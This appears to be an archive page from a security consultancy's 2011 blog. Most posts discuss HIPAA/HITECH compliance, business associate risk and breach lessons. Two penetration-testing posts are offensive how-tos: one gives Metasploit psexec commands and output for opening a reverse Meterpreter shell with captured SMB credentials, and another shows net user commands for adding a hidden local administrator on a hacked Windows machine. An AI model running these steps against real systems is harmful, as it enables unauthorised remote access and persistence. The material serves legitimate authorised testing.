Main

To Audit Or Not To Audit: If A Business Associate Is In Violation Of The HIPAA Security Rule And No One Knows, Does It Matter?

Posted on April 1, 2011 by John Abraham in Main | Leave a comment

There has been some debate as to the extent that a covered entity (CE) should audit a business associate (BA) to ensure that they are compliant with the HIPAA Security Rule and adequately safeguarding customer PHI. While I don’t offer up the answer to that question, I thought it made sense to explore some of the surrounding issues.

Some of the key factors that come to mind are:

Monetary Penalties

The HITECH Act creates “several categories of violations that reflect increasing levels of culpability” for HIPAA violations. There are four tiers of fines: $100 (“did not know”), $1,000 (“reasonable cause”), $10,000 (“willful neglect – corrected”), $50,000 (“willful neglect – not corrected”) per violation. In each tier there is a minimum fine of $50,000 per incident and a maximum fine of $1,500,000 per calendar year. As these fines are calculated per violation, with each record exposed, in the case of a data breach for example, counting as a violation, the fines can be significant. Of course, the actual fine amount is a function of the culpability. According to the HITECH Act: “in the case of a violation where it is established that a covered entity did not know of the violation and would not have known through the exercise of reasonable diligence” the lowest tier of $100 would apply.

If minimizing monetary penalty risk is a primary objective, then performing “reasonable diligence” might be the recommended approach. Though defining “reasonable” is another question.

Security

If security is your objective and protecting your client data is an important ideal, then you might define reasonable in another way. For example, if most of your patient records are accessible by one particular BA then it could be that the bulk of the CEs data security risk is really encapsulated in a single BA – and perhaps extra care might be taken to ensure the BA has an effective information security program in place. In this case you might call for the BA to perform some type of security assessment or HIPAA Risk Analysis.

Practical Business Management

Another issue is the case of a BA with the following attributes: they provides a critical business function for the CE, they have extensive access to PHI and they are difficult to swap out with another vendor. In this case it’s a question of – do I really want to know if they are in non-compliance? This is a tough question. In the best case you’d identify a critical area of security risk or non-compliance, notify the BA and then they’d fix it. But what if they don’t fix it?

Pure Capitalism

Besides the monetary fines, how else might a security incident impact revenue? Well that depends on the extent that the CE is commoditized. In the banking sector, for example, it is very easy for a customer to move from one institution to another, so a security breach can cause a wave of customer defections. If you are the only hospital in town, for example, then perhaps this is less of a risk. Other brand damage due to a security breach is more difficult to quantify.

Summary (AKA what is “reasonable”)

So perhaps its all about “reasonable due diligence”. This will depend on how each individual CE prioritizes how a security breach impacts their business and compliance responsibilities. And it will surely be the subject of extensive interpretation by both the courts and BAs (when contract liability is being litigated).

The Federal Health IT Strategic Plan and the Final Four

Posted on March 28, 2011 by Dan Berger in Main | Leave a comment

I just finished reading the ONC’s (Office of the National Coordinator for Health Information Technology) draft document The Federal Health IT Strategic Plan (“the Plan”) while watching the Butler-Florida game in the quarterfinals the 2011 NCAA Championships.

One of the ONC’s key responsibilities is to provide strategic leadership to the public and private sector. Mandated under the HITECH Act of 2009, the ONC is must publish and update its strategic plan for improving healthcare through the use of information technology. Making this plan public and in fact, inviting public comment, is helpful to the cause. It gives the ONC a vehicle to communicate priorities, guide efforts and influence allocation of resources. What’s not quite clear is how frequently the ONC is required to update the plan. The last plan was dated June 3, 2008 and covered the 5 year period 2008-2012. This latest plan is intended to cover 2011-2015. Is that sufficient? Let’s turn to basketball for a moment. .

While watching Butler beat Florida, I noticed how frequently the TV commentators used the word “adjustment” to describe mid-game coaching decisions. At this level of competition, both teams clearly started the game with a strategy for winning. So did these adjustments or tactical maneuvers reflect changes in their strategy? No. Theoretically, the development of a comprehensive strategy should include contingency planning (e.g. If X happens, do Y; if A occurs early, respond with B). Butler’s strategic plan to win the game included limiting Florida’s ability to score from the 3-point range. Yet, even having achieved that, they were losing by 11 points with 9 minutes left in the game. Contingency time. Since star player Matt Howard was in no danger of fouling out of the game, Butler could risk having him play very aggressively during the games final minutes. The strategy with contingency plan was successful. Game won.

How is this relevant to The Federal Health IT Strategic Plan? Last published in 2008, I’ll give the updated plan points for “adjusting” to the rapidly changing landscape of health IT. The past few years were marked by truly major legislation – the HITECH Act and the Patient Affordable Care Act have galvanized  organizations throughout the industry; each mapping out their own specific organizational goals and initiatives.  We are now on the verge of dramatic changes. With that, the ONC’s new 5-year plan builds on the foundation of meaningful use (both as a rallying cry and as a measure of electronic health record (EHR) adoption and information exchange), with the ultimate goal of improving health care outcomes.

The Strategic Plan sets 5 overriding goals for “unlocking the vast promise of electronic health information to improve decision making, help individuals better manage their health, and improve the health system’s capacity for rapid learning.” These goals are listed below:

  • Goal I, the health information exchange strategy focuses on first fostering business models that create health information exchange, supporting exchange where it is not taking place, and ensuring that information exchange takes place across different business models.
  • Goal II, we discuss how integral health IT is to the National Health Care Quality Strategy and Plan that is required by the Affordable Care Act.
  • Goal III, we highlight efforts to step up protections to improve privacy and security of health information, and discuss a major investment in an education and outreach strategy to increase the provider community and the public’s understanding of electronic health information, how their information can be used, and their privacy and security rights under the HIPAA Privacy and Security rules.
  • Goal IV, we recognize the importance of empowering individuals with access to their electronic health information through useful tools that can be a powerful driver in moving toward more patient-centered care.
  • Goal V, we have developed a path forward for building a “learning health system,” that can aggregate, analyze, and leverage health information to improve knowledge about health care across populations.

Admirable. But is it a winning strategy? Since the ONC has asked for public comment, I’m going to give it. In the 80-page document, only 6 pages are dedicated to privacy and security (pp 29-35), nowhere near sufficient. Also, efforts to improve privacy and security are listed as Goal #3 on a list of 5. This gives this very important topic the imprimatur of being either third in priority or third in time sequence. Even if an unintended impression, it is at best misleading as privacy and security are necessary conditions for achievement of all of the other 4 goals. Also to be fully comprehensive, the ONC’s Strategic Plan must address contingencies – what if breaches continue to increase despite more stringent breach notification rules and more costly penalties? How can the industry combat the undermining of public trust by publicizing its failures?

I’d suggest elevating privacy and security to a higher plane. Rather than a goal, make it as foundational an element as meaningful use. I’m be submitting my more formal comments by the April 22 deadline via the HSS ONC Health IT Buzz Blog – accessible at http://www.healthit.gov/buzz-blog/from-the-onc-desk/hit-strat-plan/#comment Meanwhile I’d love to hear your thoughts on how we can make privacy and security the bedrock of the strategic plan. Perhaps we can borrow from the “Butler Way,” and agree that the mission to transform healthcare IT “demands commitment, denies selfishness, accepts reality yet seeks improvement every day, while putting the team above self.” This is a game we can’t afford to lose. Go Bulldogs!

RSA Breach – What Can Be Learned

Posted on March 20, 2011 by John Abraham in Main | Leave a comment

It’s big news that RSA’s infrastructure around their SecureID solution has been compromised. While information around this attack and its impact on customers is lacking (RSA is citing an ongoing investigation as a reason to limit public disclosure) a couple of lessons about general security management can be learned.

The first lesson is around vendor management.  As a security assessment company, we get to hear a lot of people at organizations around the world describe their state of security. One thing that we hear a lot is about how secure their vendors are. With little support other than reading a vendor’s marketing materials, the existence of a SAS-70, or listening to the vendor’s sales team story about security, it is assumed that a vendor is secure. If the recent NASDAQ Directors Desk breach is an example of why a vendor’s big claims around security don’t necessarily actually imply security, then this week’s RSA breach exemplifies that a company is secure just because they are big or sophisticated. In our experience, vendors, big or small, often represent the biggest component of an organization’s security risk – no matter what the claim about their security.

Another lesson to be learned from the RSA breach is around complexity. In our experience complexity equates to security risk – the more complexity you have in your IT environment the more inherent security risk. While I wouldn’t say its time to throw away all of your multi-factor authentication solutions – after all, they are generally an effective way to mitigate the risk of a compromised password, I do think its important to realize that every time a new technology is introduced into your IT environment, you are increasing your overall complexity and thus adding some additional risk. So its important to think through any new technology deployment and ask yourself: does the upside of this deployment outweigh the downside of adding complexity to my data center? Security is all about operational discipline, structured process, rigorous testing and smart people – all of which tend to be in short supply; always be aware of how added complexity taxes your finite resources.

So, while it might be too early to get rid of all of your SecureID technology, its not too early to be aware that vendors may represent a big piece of your security risk and the added complexity of more layers of technology in an IT environment represent additional security risk to your organization. Not that vendors and technology are bad, they are necessary, but its important to understand their impact to your risk management strategy.

A “Reasonable” Approach to HIPAA Risk Analysis

Posted on March 17, 2011 by Dan Berger in Main | Leave a comment

The Office of Civil Rights (OCR) is responsible for issuing annual guidance on the provisions in the HIPAA Security Rule (45 C.F.R. §§ 164.302 – 318.). But with so much recent interest in IT security driven by the “meaningful use” incentive program, we want to share some our observations and perspectives from recent Redspin client engagements in the healthcare industry.

All electronic protected health information (ePHI) created, received, maintained or transmitted by an organization is subject to the Security Rule. The importance of safeguarding ePHI cannot be understated. Sure, publicized breach notifications and million dollar penalties damage a healthcare organization’s reputation and bottom line. But more than that, such incidents undermine professional and public trust of electronic health records (EHR). And make no mistake about it – the widespread adoption of EHR is fundamental to future improvements in efficiency, communications and patient care.

So if security is the cornerstone to health IT transformation, what can your organization do to not only comply with the regulations but also contribute to this important mission? First, all heathcare organizations are required to evaluate risks and vulnerabilities in their environments. Then they must “implement reasonable and appropriate security measures to protect against reasonably anticipated threats or hazards to the security or integrity of e-PHI.” While “reasonability” is a quintessential element of modern judicial systems, it doesn’t provide a lot of guidance. At Redspin, we suspect there will be little sympathy for major ePHI security breaches no matter what any standard of reasonability might dictate. More simply put, it’s better to be safe than sorry.

Conducting a risk analysis that maps to the HIPAA Security Rule is the first step in protecting ePHI. Note, the Department of Health and Human Services (HHS) does not endorse or recommend any particular risk analysis or risk management model. At Redspin, we think this is wise. From our direct experience, no template or “one-size-fits-all” approach can meet the diverse needs of the healthcare industry. We treat each client individually and conduct a thorough review of their environment even before drafting a scope of work, including:

- size and complexity of the IT environment

- number of physical and logical locations where ePHI is stored

- number of IT staff; their knowledge and experience level

- types of EHR, CPOE and other new applications

- functional responsibilities of team members

- progress-to-date toward EHR completion

- company culture and information security awareness

While a HIPAA Risk Analysis is often project-based, we also consider it the start of a process that will lead to ongoing and durable improvements in information security. The Security Rule itself requires an entity to update and document its security measures “as needed” and specifically recommends conducting continuous risk analysis to identify when such updates are warranted. While the rule does not specify how frequently to do this, it’s a moot point for Redspin’s enterprise security assurance clients. By providing our services on a monthly or quarterly subscription basis, regularly-scheduled assessments, validation and re-testing simply become part of an overall operating environment. Our enterprise solution also tracks and documents all historical findings and remediation via our secure, online web portal. The portal’s dashboard view displays summary information via a compelling graphical user interface, making complex data easier to understand and better enabling you to communicate improvements in your overall security posture to all stakeholders.

In summary, Redspin empowers healthcare organizations to truly integrate their risk analysis and management process. This helps them to accommodate: (1) new technologies (2) evolving business operations, (3) new regulations and (4) personnel changes. And by addressing security risks in a proactive, timely manner rather than fixing problems after implementation, healthcare organizations gain greater value from their investment in IT. Sound reasonable?

Get a Meterpreter Shell Using SMB Credentials

Posted on March 15, 2011 by Mark Marshall in Main | 1 Comment

The Meterpreter shell in Metasploit is a fantastic way to interact with a compromised box. It runs entirely in memory and leaves no trace of itself after you disconnect, allowing you to pillage and plunder cleanly without leaving any tracks.

I find myself using it fairly frequently against Windows machines that I’ve already gotten credentials for via some other means. In those cases it doesn’t make sense to use an actual exploit to get a Meterpreter shell going.

Use the psexec exploit (which actually isn’t an exploit, but whatever) to accomplish this:

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 10.10.0.122
rhost => 10.10.0.122
msf exploit(psexec) > set smbpass Changem3
smbpass => Changem3
msf exploit(psexec) > set smbuser mark
smbuser => mark
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
RHOST      10.10.0.122      yes       The target address
RPORT      445              yes       Set the SMB service port
SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
SMBPass    Changem3         no        The password for the specified username
SMBUser    mark             no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST     10.10.0.149      yes       The listen address
LPORT     4444             yes       The listen port
msf exploit(psexec) > exploit

[*] Started reverse handler on 10.10.0.149:4444
[*] Connecting to the server...
[*] Authenticating to 10.10.0.122:445|WORKGROUP as user 'mark'...
[*] Uploading payload...
[*] Created \OUBfKBZr.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.0.122[\sv
cctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.0.122[\svcc
tl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (PWFeuNyE - "MthJLAgTDPzWvZXfaw")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Sending stage (749056 bytes) to 10.10.0.122
[*] Deleting \OUBfKBZr.exe...
[*] Meterpreter session 1 opened (10.10.0.149:4444 -> 10.10.0.122:1052) at 2011-
03-13 17:08:13 -0700
meterpreter > sysinfo
Computer   : EARTH
OS         : Windows XP (Build 2600, Service Pack 3).
Arch       : x86
Language   : en_US
Meterpreter: x86/win32

File and Print Sharing (445/tcp) needs to be enabled on the target host (duh) or this obviously won’t work.

HIPAA Enforcement Training for State Attorneys General – Is this a good thing or bad?

Posted on March 10, 2011 by John Abraham in Main | 1 Comment

I received an email notification about State Attorneys General HIPAA enforcement training posted by Joseph Conn at ModernHealthcare.com. The HITECH Act gave authority for state attorneys general to bring civil actions to obtain monetary damages for residents in their state for HIPAA Security Rule and Privacy Rule. What might it mean that the Office of Civil Rights (OCR) has scheduled enforcement seminars open only to State Attorneys General and their staff? The OCR has four of these 2-day seminars scheduled between April and June of this year, in Dallas, Atlanta, Washington and San Francisco. Whereas before the HITECH Act HIPAA was seen as having no teeth, in part due to the lack of enforcement resources available, bringing cash strapped state-resources into the picture could change the compliance landscape considerably.

Here are topics covered in these seminars as documented on the OCR’s website:

  • General introduction to the HIPAA Privacy and Security Rules
  • Analysis of the impact of the HITECH Act on the HIPAA Privacy and Security Rules
  • Investigative techniques for identifying and prosecuting potential violations
  • A review of HIPAA and State Law
  • OCR’s role in enforcing the HIPAA Privacy and Security Rules
  • SAG roles and responsibilities under HIPAA and the HITECH Act
  • Resources for SAG in pursuing alleged HIPAA violations
  • HIPAA Enforcement Support and Results

Based on the topics covered, a couple of questions come to mind:

Will the states only get involved after a PHI disclosure incident or reported violation, or is there some intention of a pro-active HIPAA audit? The OCR indicates that their enforcement process can be initiated by either a complaint or a compliance review. What will drive the State Attorneys General enforcement actions?

How will the State Attorney’s General interpret the HIPAA Security Rule? HIPAA leaves plenty of latitude for compliance. Flexible guidelines can be a good and a bad thing for covered entities and business associates. On the positive-side flexibility enables a healthcare organization to create a meaningful and practical information security program that effectively mitigates security risk – the intent. However, State Attorneys General may also interpret compliance guidelines differently than their targets. The effect of this is that healthcare organizations may focus more on the letter of the law, than the intent. However, compliance and security are two different things. At Redspin we are more comfortable with organizations that take a practical risk-based approach to security and HIPAA Risk Analysis, than someone purely focused on compliance. We’ve seen too many cases of organizations that claim to be 100% compliant but are in reality totally insecure.

A Systematic Approach to Managing Business Associate Risk

Posted on March 9, 2011 by John Abraham in Main | Leave a comment

Here we discuss the need for, and an approach for developing, a structured Business Associate oversight program for data security risk management.

HIPAA and the HITECH Act have highlighted the importance of Business Associate (BA) security. Covered Entities (CEs) need to effectively manage Business Associates security risk, and BAs need to understand their compliance requirements and liability under HIPAA and HITECH regarding protecting protected health information (PHI).

The entire supply chain of PHI from CEs to BAs to BA subcontractors are now subject to compliance with the HIPAA Security Rule. Not only has the definition of BAs been expanded to include data transmission services like HIEs and RHIOs, but BAs now face dual liability – they have both contractual liability to CE for HIPAA compliance via Business Associate Agreements (BAAs) and also direct liability to the government. Furthermore the July 14th, 2010 notice of proposed rulemaking (NPRM) modifying HIPAA under the HITECH Act clarifies that a lack of understanding is not a valid defense for HIPAA compliance violations.

Given the enhanced breach notification requirements, monetary penalties and increase government scrutiny, both CEs and BAs need to effectively manage security risk. As a security assessment firm, we understand that performing an objective and technically astute security assessment or HIPAA Risk Analysis is an effective way to support a structured information security program that mitigates security and compliance risk under HIPAA. However, we also understand that while performing a dedicated assessment on one’s own organization is a practical solution, devoting significant capital to performing security assessments on BAs and subcontractors might not be feasible. But given the current regulatory climate, having no visibility into a BAs current state of security is not practical either.

What follows is a high-level view of an approach to managing BA risk that is manageable, structured, practical and can be documented to show organizational commitment to a robust risk management program. We see this as an effort that is implemented by a CE in several phases. While the duration for completion of the entire process varies widely depending on the size of the CE in question, we’d expect the duration of the entire process to range from several weeks for a small organization to several months for a larger CE. BA’s need to also be aware of this process – not only to manage any of their own BAs, but also with the expectation that their CE clients will soon be asking the very same questions discussed here.

Business Associate Oversight Program Overview

The primary goal of a BA oversight program is to create a systematic and well-documented process for evaluating and prioritizing risk of a BA PHI data breach or HIPAA Security Rule compliance violation by determining that BAs have the necessary technical, physical and administrative safeguards in place to protect shared PHI.

Step 1: Create BA risk matrix to characterize BAs in terms of data classification, BAA terms and testing history.

Compile a complete list of BAs and create a matrix of readily available information about each BA. While each situation is unique, the following categories should be considered for evaluation.

  • Data Classification: This category defines attributes associated with the data the BA has access to, such as the number of records shared with the vendor, criticality and sensitivity of the data, breach history, etc.
  • Business Associate Agreement Terms: For each BA on the list, document status of BAA. Does BAA specify appropriate BAA PHI safeguards, notification of disclosures, etc.? Is there a termination-after-breach clause and a right-to-audit clause, …?
  • Testing History: Note for each BA the last security assessment performed, the date, and whether it was performed internally or by a third-party. Are results of security assessments available for review by CE?

Step 2: Based on attributes logged in the previous step, prioritize BAs in terms of risk.

Based on the information above, compiled in a matrix, the BAs can be readily prioritized based on risk – high risk at the top, low risk at the bottom. This can be implemented qualitatively or quantitatively. In the example below we show a snippet of a matrix in which a hybrid approach is taken. Notice how the data sensitivity, for example, is given a 1, 2 or 3 rating to represent low, medium or high sensitivity. In this way the data risk can be used as a numerical risk rating to aid in risk prioritization.

Business Associate Risk Matrix

Step 3: Determine which vendors require additional evaluation as a function of risk profile on matrix.

Based on the number of vendors on the list and the general risk profile of the BAs, determine the scope and schedule for additional BA security verification. Additional evaluation may include:

  • Requiring vendor to complete additional information via questionnaire (download sample Business Associate Questionnaire)
  • Telephone interview of BA
  • Spot checking of specific security controls defined on questionnaire as a cost-effective sampling strategy to extrapolate opinion of overall state of security
  • Full-scope security assessment or HIPAA Risk Analysis

Step 4: Report to BAs and monitor progress

Any findings, deficiencies or requests for further information (such as validation that a security issue has been mitigated, or that the BA has completed security testing) should be reported to the BAs. Any deficiencies should be documented and followed-up on by CE to ensure BA is addressing issues.

Step 5: Keep matrix up-to-date.

Annually, or whenever there is significant change, keep matrix up-to-date to ensure that high risk vendors are given appropriate attention. Based on this, just as in a traditional information security program, cycle back to Step 1 as necessary.

Summary

While even the largest healthcare organizations are not likely to perform an onsite security assessment for each BA, our clients that range from small-to-medium sized organizations to Fortune 100s, have effectively utilized a risk-based approach to prioritize vendors by risk such that high risk vendors are quickly isolated for further scrutiny. The process outlined above can systematically reduce risk in a rapid and cost-effective manner with a repeatable process that ensures accountability and documents an organization’s dedication to a robust information security program.

Charleston Area Medical Center (CAMC) Data Breach – What Can Be Learned?

Posted on March 8, 2011 by John Abraham in Main | Leave a comment

It’s always educational to review a data security breach to see what can be learned. In the case of the Charleston Area Medical Center (CAMC) last month a number of lessons can be learned. First lets review what we know (and don’t know) about the data breach which happened at CAMC subsidiary CAMC Health Education Research Institute (CHERI).

What Happened

It was a pretty straight forward breach. Last month someone doing an online search for an address found that the name of a relative and their ePHI was readily accessible on a CAMC website via a Google search. He immediately notified the relative who in turn contacted the State of West Virginia Attorney General. The Attorney General’s Consumer Protection Division quickly had the offending site shut down. In all 3655 patients were involved with the breach whose data had been accessible on the site since September of 2010. The site was created by a contractor who inadvertently enabled access to the data.

More Questions than Answers

  • If the contractor had access to ePHI, were they treated as a Business Associate (BA)?
  • Was there a Business Associate Agreement (BAA) in place?
  • Was protecting ePHI specified as an upfront feature/requirement of the site created by the contractor?
  • Was any application penetration testing performed on the site before it went live?
  • As a result of the breach CAMC has agreed to additional safeguards including a security assessment – does this imply that CAMC had not previously performed a HIPAA Risk Analysis?!?!

Lessons Learned

An ounce of prevention…: While we don’t know details of this particular vulnerability, it appears that an application penetration test would have identified the risk and enabled trivial remediation before an incident. That would be a fraction of the cost of this breach. Its hard to determine the CAMC brand damage and staff costs associated with a breach like this. And its too early to tell if the hospital will see HIPAA / HITECH Act fines associated with the incident. The Equifax credit monitoring cost is also unclear, though calculating the retail cost from their site at $15 per month per user for each of the 3655 individuals affected by the breach for a year tallies to over $54,000 per month and over $650,000 for the year …. a pound of cure.

Security Assessments have more value before a breach: Well I am stating the obvious here, but there’s more to the point than the obvious fact that identifying this particular vulnerability early would be much less painful on the organization. The point is that, in our experience, incident-driven assessments are often knee-jerk reactions to a compliance issue that are completed more to show reaction and publicize respect for client ePHI rather than a core value-driven approach to secure operations. These types of assessments often cost way more and the value can be limited. The value of a security assessment is proportional to an organizations bandwidth to absorb the findings and willingness for organizational improvement. An event-driven assessment for CAMC will not yield a lot of value if the health IT staff is not ready to react to the findings.

Ensure BAs are aware of the need to protect ePHI: When you outsource to a vendor, you are outsourcing the actual labor, but also to a certain extent security management. While you want to expect that a vendor would be aware of information security best practices you can’t always trust the BA to be secure. A robust BAA shows you care? While requiring a BA to complete a Business Association Self Assessment Questionnaire may not be appropriate for a web site developer, quizzing them on a secure software development life cycle might filter out incompetent developers and send a message that you care about their performance.

Managing HIPAA / HITECH Act Risk in ePHI Supply Chain

Posted on March 7, 2011 by John Abraham in Main | 1 Comment

HITECH and the notice of proposed rule making (NPRM) published in the Federal Register July 14, 2010 significantly impact how Covered Entities (CEs) and Business Associates (BAs) manage health IT security risk under HIPAA. It has, in effect, created an ePHI supply chain in which everyone on the chain needs to worry about the security controls of everyone else in the chain. Here’s why:

  1. Business Associates: the definition of a BA is expanded to include data transmission services such as HIEs and RHIOs and also subcontractors of BAs that have access to ePHI.
  2. HIPAA Security Rule: BAs are now responsible for complying with the HIPAA Security Rule.
  3. Penalties: penalties for noncompliance apply not only to CEs, but also BAs and BA subcontractors.
  4. oops, we didn’t know:” a BA can no longer use “lack of knowledge” as a defense to limit liability for HIPAA non-compliance violations.
  5. Dual Liability: BAs have contractual liability to CE for HIPAA compliance via Business Associate Agreements (BAAs) as well as liability directly to the government for HIPAA compliance.

What can you do? Whether you are a CE, a BA or a subcontractor of a BA, a number of steps can reduce your risk.

  1. Policies: Ensure you have effective and practical policies and procedures in place to document how you manage health IT and mitigate security risk.
  2. Training: Educate employees to ensure they understand the policies as well as the spirit and intent of those policies.
  3. Assessment: Complete a HIPAA Risk Analysis to identify security risk, determine effectiveness of security controls and measure conformance with policies and the HIPAA Security Rule. Whether you are a CE or a BA or a BA subcontractor you need to understand where your risk to disclosing ePHI lies. Lack of knowledge does not limit liability and completing a risk assessment helps focus risk mitigation measures and indicates a commitment to a robust information security program in the event of post-data-breach-litigation.
  4. Manage Vendor Risk: Both CEs and BAs need to understand the extent that vendors magnify their risk of ePHI disclosure. Because every organization has limited resources, its important to prioritize vendors to determine which ones represent the highest risk of ePHI disclosure. Here are steps to consider for all BAs, especially those that are considered high risk:
  • Upgrade BAAs to include a right-to-audit clause in which you are enabled to perform a HIPAA Risk Analysis or other assessment to verify vendor’s risk profile.
  • Require BAs (or subcontractors) to complete a Business Associate Security Questionnaire in which they must attest to some basic elements of their information security program.
  • Threaten to periodically audit or spot check certain answers to the BAs Business Associate Security Questionnaire.

Given the expanded liability and compliance requirements of the ePHI supply chain under HIPAA and the HITECH Act, performing some minimal risk management efforts can dramatically reduce risk throughout the chain.

Managing Windows User Accounts via the Commandline

Posted on March 3, 2011 by Mark Marshall in Main | Leave a comment

Just hacked a box on a penetration test but can’t get a Meterpreter shell on it for some reason? Add yourself a new account quickly with these easy commands. Works on all current versions of Windows (assuming you’ve got an admin-level account).

Add local account of goat with password of  T@styHay!
net user /add goat T@styHay!

Net User Add

Now add the goat account to the local administrators group
 net localgroup administrators /add goat

Net Localgroup Add

View members of the local administrators group and make sure your new account is there
net localgroup administrators

Net Localgroup Administrators

Once you’re done, it’s polite to delete your account.
net user /delete goat

Net User Delete

Other handy account management

Show all users on the local box
net user
Disable an account
net user goat /active:no
Enable an account
net user goat /active:yes
Change a users password
net user goat T@styAlfalfa!

« Previous   1 2 ... 4 5 6 7 8 9 ... 16 17   Next »